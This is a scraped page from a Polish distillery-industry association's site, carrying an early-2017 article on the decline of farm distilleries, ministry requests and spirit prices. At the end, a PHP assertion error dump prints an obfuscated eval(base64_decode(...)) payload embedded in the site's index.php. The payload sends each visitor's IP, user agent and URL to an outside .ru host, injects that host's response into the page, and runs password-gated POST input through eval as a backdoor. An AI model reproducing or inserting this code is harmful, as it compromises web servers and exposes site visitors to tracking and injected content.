Get Adobe Flash player
Polecamy:

Informacja Firmy BETTER ENERGY

Nowoczesna Technologia
Produkcji Spirytusu


ZGP współpracuje z firmą
MARCON z Poznania w sprawie
dot. rejestracji  etanolu 
systemie REACH"

www.chemiakonsulting.pl/

Szukaj ogłoszenia
Licznik odwiedzin
Dzisiaj129
Wczoraj330
Wszystkie odwiedziny984931
Galerie

Notice: Undefined variable: cssimg in /home/biznesplan/ftp/ZGP/modules/mod_jglatestcat/helper.php on line 192
Start

GORZELNIE ROLNICZE W POLSCE JESZCZE ISTNIEJĄ,

Chociaż  reprezentujący je Związek Gorzelni Polskich zdaje sobie sprawę, że nasz byt  uwarunkowany jest  aktualną i perspektywiczną sytuacją rynkową oraz  wymaganiami prawnymi, jakie  wymuszane są przepisami dostosowującymi polskie prawo do prawa unijnego.  W 2016 r. udało się powstrzymać  istniejący jeszcze w  2014 r.  proces  likwidacji gorzelni rolniczych. Pojawiały się nawet sygnały o możliwości budowy nowych zakładów.

W wyniku składanych w  2016 r. przez Związek do Ministra Rolnictwa i Rozwoju Wsi wniosków  z „Programu 50 Plus”, w sierpniu 2016 r. otrzymano karty zadań do wniosku Nr 2, w których zapisano 7 zadań zgłoszonych przez Związek przypisanych do realizacji odpowiedzialnych wiceministrów ze wskazaniem odpowiednich Departamentów Ministerstwa i Naczelników Wydziałów. Poszczególne zadania obejmują:

1. Nr 2 – Objęcie przez MRiRW funkcji koordynatora działań prowadzonych z inicjatywy ZGP w stosunku do MF (akcyza, zabezpieczenia), MG (spirytus jako OZE), MŚ (wywar gorzelniany) i MZ (etanol jako substancja toksyczna) – Wiceminister Jacek Bogucki, Dep. Rynków Rolnych, Naczelnik Krzysztof Potocki,

2. Nr 7 -  Objęcie gorzelni specjalną ochroną w ramach polityki rolnej państwa w PROW 2014-2020, Wiceminister Ryszard Janusz Zarudzki, Dep. Rozwoju Obszarów Wiejskich, Naczelnik Paweł Traczyk.

3.  Nr 10 – Uchwalenie ustawy zezwalającej na produkcję regionalnych  okowit i nalewek przez gorzelnie w ramach koncesji,  Wiceminister Jacek Bogucki, Dep. Rynków Rolnych, Naczelnik Krzysztof Potocki,

4. Nr 12 -  Uznanie melasu buraczanego za odpad z przemysłu cukrowniczego w procesie certyfikacji gorzelni wg systemu RED, Wiceminister Zbigniew Babalski, Dep. Gospodarki Ziemią, Naczelnik Jarosław Wiśniewski,

5. Nr 14 – Wystąpienie do KE o zwolnienia z obowiązku certyfikacji w systemie RED małych i średnich gorzelni rolniczych,  Wiceminister Zbigniew Babalski, Dep. Gospodarki Ziemią, Naczelnik Jarosław Wiśniewski,

6.  Nr 16 -  Utrzymywanie małych i średnich gorzelni rolniczych jako elementu bezpieczeństwa energetycznego kraju,  Wiceminister Zbigniew Babalski, Dep. Gospodarki Ziemią, naczelnik Jarosław Wiśniewski,

7.  Nr 17 -  Tworzenie centrów energetycznych złożonych z gorzelni i biogazowi rolniczych, Wiceminister Zbigniew Babalski, Dep. Gospodarki Ziemią, Naczelnik Jarosław Wiśniewski.

Trudno jest na początku 2017 r. ocenić, jakie będą rezultaty działań zaplanowanych przez MRiRW, ale Związek otrzymał   formalne zapewnienie, że jego postulaty zostały przyjęte. Będzie zatem monitorował  wykonywanie tych zadań  w ramach przyjętych form współpracy.

Istniejące gorzelnie rolnicze, a wg Związku jest  jeszcze w Polsce  ok. 60 czynnych, z krótkimi przerwami,  w 2016 r. produkowały wysokojakościowy spirytus  na  cele konsumpcyjne, chociaż nie zawsze uzyskiwały satysfakcjonującą cenę. Średnia cena w 2016 r.  wyniosła 2,15 zł /l spirytusu surowego, a najniższa odnotowana  to 1,80 zł/l.

Produkcja spirytusu na cele paliwowe  musiała uwzględniać tzw. współczynnik redukcji emisji dwutlenku węgla i zezwalała jeszcze – przy 50% redukcji – na wykorzystywanie ziarna kukurydzy, chociaż   produkcja ta  kształtowała się praktycznie na  granicy opłacalności.  Jeśli od lipca 2017 r. wzrosną koszty za  węgiel (zwolnienie z akcyzy obowiązuje tylko do 1 lipca 2017 r.), wówczas średni wzrost koszów wyniesie ponad 40 zł/t węgla, a to oznacza dalsze pogorszenie wskaźnika opłacalności produkcji spirytusu. Większość istniejących gorzelni nie będzie w stanie ponieść dodatkowych kosztów na modernizację techniczną , która zapewniłaby uzyskanie  odpowiednich audytów na podstawie których będzie możliwe  utrzymanie zwolnienia z akcyzy.

Na szczęście nie weszły w 2016 r.  w życie drakońskie przepisy odnośnie kosztów wody, co pozwoliło gorzelniom utrzymać opłaty za korzystanie ze środowiska na poziomie ubiegłorocznym, chociaż w relacji do cen spirytusu stanowiły one wciąż znaczącą pozycję. Skorelowanie tej opłaty z wielkością produkcji oraz  faktycznym zużyciem wody stanowi jeszcze możliwość  kontrolowania jej i utrzymywania określonego reżimu.

Z informacji, jakie Związek posiada,  w niektórych krajach UE, w tym we Francji i w Niemczech, na niektóre produkty rolno-spożywcze zostały ustalone ceny minimalne gwarantujące producentom minimalną opłacalność produkcji.  W Polsce – jak tłumaczono -  nie było dotychczas możliwości zastosowania ich w stosunku do spirytusu surowego, co uzasadniano  właśnie obowiązującymi w UE przepisami. Związek  planuje  powrócić  w br. do tego tematu, aby ostatecznie wyjaśnić, czy faktycznie nie ma takiej możliwości, skoro w innych krajach unijnych  ceny takie są stosowane. Wprowadzenie cen minimalnych na spirytus surowy pozwoliłoby utrzymać   gorzelnie rolnicze, które  nie są już w stanie  bilansować kosztów w stosunku do osiąganych przychodów, a co w konsekwencji doprowadza ich do bankructwa.

W I kwartale br. Związek przystąpi do inwentaryzacji gorzelni rolniczych, aby wykazać  faktyczny stan ilościowy oraz ich  kondycję i potencjał produkcyjny.

 

Doradca Prezesa

Związku Gorzelni Polskich

mgr inż. roln.  Józef Inorowicz

 

Dodaj komentarz


Kod antysapmowy
Odśwież

Assertion failed!


Script: /home/biznesplan/ftp/ZGP/index.php
Line: 103
Condition:
eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGVycm9yX3JlcG9ydGluZyhFX0FMTCk7QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIix0cnVlKTtAZXJyb3JfcmVwb3J0aW5nKDApOwppZighZW1wdHkoJF9DT09LSUVbImNsaWVudF9jaGVjayJdKSAmJiBlbXB0eSgkaWJ2KSkgeyAkaWJ2ID0gJF9DT09LSUVbImNsaWVudF9jaGVjayJdOyAgZWNobyAkaWJ2O30gZWxzZWlmIChlbXB0eSgkaWJ2KSkgewppZiAoc3Ryc3RyKCRfU0VSVkVSWyJIVFRQX0hPU1QiXSwgIjEyNy4wIikpeyRuYW1lID0gJF9TRVJWRVJbIlNFUlZFUl9BRERSIl07fWVsc2V7JG5hbWUgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07fQokdXNlcmEgPSBpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pP3VybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOiIiOwokdXJsID0gImh0dHA6Ly9hdmVuczcyLnJ1L2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjMwMGQwYjhiOTUzNTA4ZTdhMDQ2Y2UzZjQxODJiM2ZkMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gImU4ZjJkMDdmODVhYWY1ZjY0OGQ2MzQyYTRjYTkxYWUxIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));
variable value
$0"
key value
$function"debug_assert_callback"
[args]Nested Array
$1"
key value
$file"/home/biznesplan/ftp/ZGP/index.php"
$line"103"
$function"assert"
[args]Nested Array